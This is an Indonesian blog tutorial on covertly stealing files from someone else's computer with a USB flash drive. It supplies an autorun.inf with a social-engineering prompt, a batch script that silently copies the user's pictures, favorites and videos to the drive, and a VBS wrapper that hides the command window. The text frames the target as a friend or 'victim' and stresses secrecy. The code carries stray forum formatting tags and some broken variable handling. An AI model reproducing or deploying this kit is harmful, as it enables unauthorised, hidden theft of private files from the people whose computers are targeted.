Cara Mencuri File Dari Komputer ke Flashdisk Update 2019

Posted on

Istimiwir.Com – Cara mencuri file komputer untuk di pindahkan ke flashdisk Anda sebenarnya adalah tindakan yang tidak di coba, Namun pernahkah Anda pernah berpikir menginginkan suatu file yang tidak kita punya di komputer teman Anda sendiri.

Apa itu Flashdisk? Kita tahu semua orang pasti mengenal barang tersebut, jika belum saya jelaskan sedikit saja. Flashdisk adalah penyimpanan data memori yang bisa di gunakan untuk komputer, smartphone, radio dan lain – lain bisa di katakan juga kandar kilas USB. Trik ini mungkin banyak yang sudah mengetahui, namun untuk postingan akhir bulan julan ini kembali saya update dan saya bagikan bagi Anda, selebihnya nanti bisa di praktekkan menggunakan komputer dan flashdisk Anda.

BACA JUGA:
1. Cara Download File Dari Mega.co.nz Tanpa Aplikasi Tambahan
2. Cara Mengunduh Mp3 Tanpa Aplikasi dan Lebih Sedikit Data

Trik ini hanya menancapkan USB Flash driver ke PC untuk menyalin semua file dari temanmu seperti foto, video, aplikasi, lagu dan file lainnya secara otomatis ke komputer Anda secara diam-diam.

Langsung saja tutorial mengenai cara mencuri file komputer ke flashdisk simak dibawah ini.

Cara mencuri file komputer ke flashdisk
Gambar: Flashdisk




Langkah-Langkah Cara Menyalin File dari Komputer ke Flashdisk:

1. Siapkan notepad (saya sarankan Notepad ++) dan copy-paste baris berikut

Code:

autorun][/B][/B]
[B][B]icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

Simpan ini sebagai autorun inf.

Garis ikon itu opsional dan Anda juga dapat mengubah dengan selera Anda atau membiarkannya ke default saja. Ini berguna untuk tujuan rekayasa sosial seperti menarik pengguna untuk mengeklik file di drive dengan membuatnya seperti terlihat permainan atau sejenisnya.

Perintah “action=” juga opsional, tapi terkadang saat autorun dijalankan mungkin meminta pengguna untuk membuka. Bergantung pada apa yang Anda yang dimasukkan disini pengguna akan diinstruksikan untuk klik OK.

Kode tersebut bertindak sebagai cadangan kalau pengguna ditanya apa yang harus dibuka, namun tidak berlaku untuk komputer.

2. Buka notepad lagi dan copy code berikut

Code:

@echo off[/B][/B]
[B][B]:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls[code/]

Simpan sebagai file.bat

[COLOR=rgb(64, 64, 64)]S File STH dikonfigurasi untuk menyalin isi folder foto, favorit, dan video pengguna saat ini ke drive Flash di bawah folder yang disebut “all”. Ini adalah bagian kode yang perlu diedit tergantung pada apa yang ingin Anda salin.

The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.
[/COLOR]

3. Buka kembali notepad dan copy kode dibawah

Code:

[COLOR=rgb(64, 64, 64)][code]CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False

Simpan sebagai invisible.vbs

Kode ini menjalankan file.bat sebagai sebuah proses, sehingga tidak menunjukkan prompt CMD dan semua file batch sedang di proses.

4. Buka notepad kembali dan salin kode berikut

Code:

wscript.exe \invisible.vbs file.bat

Simpan sebagai launch.bat

5. Salin 4 semua file yang dibuat pada langkah diatas dan letakkan di Flash drive, termasuk file ikon jika di perlukan. Buat juga folder yang bernama “all” dimana isinya akan diisi secara otomatis.




Anda bisa memanggil folder dengan nama apapun, tetapi Anda juga perlu merefleksikan perubahan yang Anda buat pada langkah kedua (2).

Penting!! : Ini semua yang perlu dilakukan. Uji Flash drive di komputer Anda terlebih dahulu sebelum mencoba pada file di komputer korban yang ingin Anda curi dan pastikan berjalan sempurna.

Jika Anda masih bingung dengan tutorial diatas atau ada hal yang ingin ditanyakan silahkan komentar dibawah dan tetap pantau situs ini secara berkala untuk mendapatkan berbagai informasi update terbaru yang lain.

Demikianlah untuk tutorial cara mencuri file komputer ke flashdisk sampai disini dahulu. Selamat mencoba dan Semoga Bermanfaat.

Artikel Diperbaharui pada Tanggal: 09 Juli 2019

Tinggalkan Komentar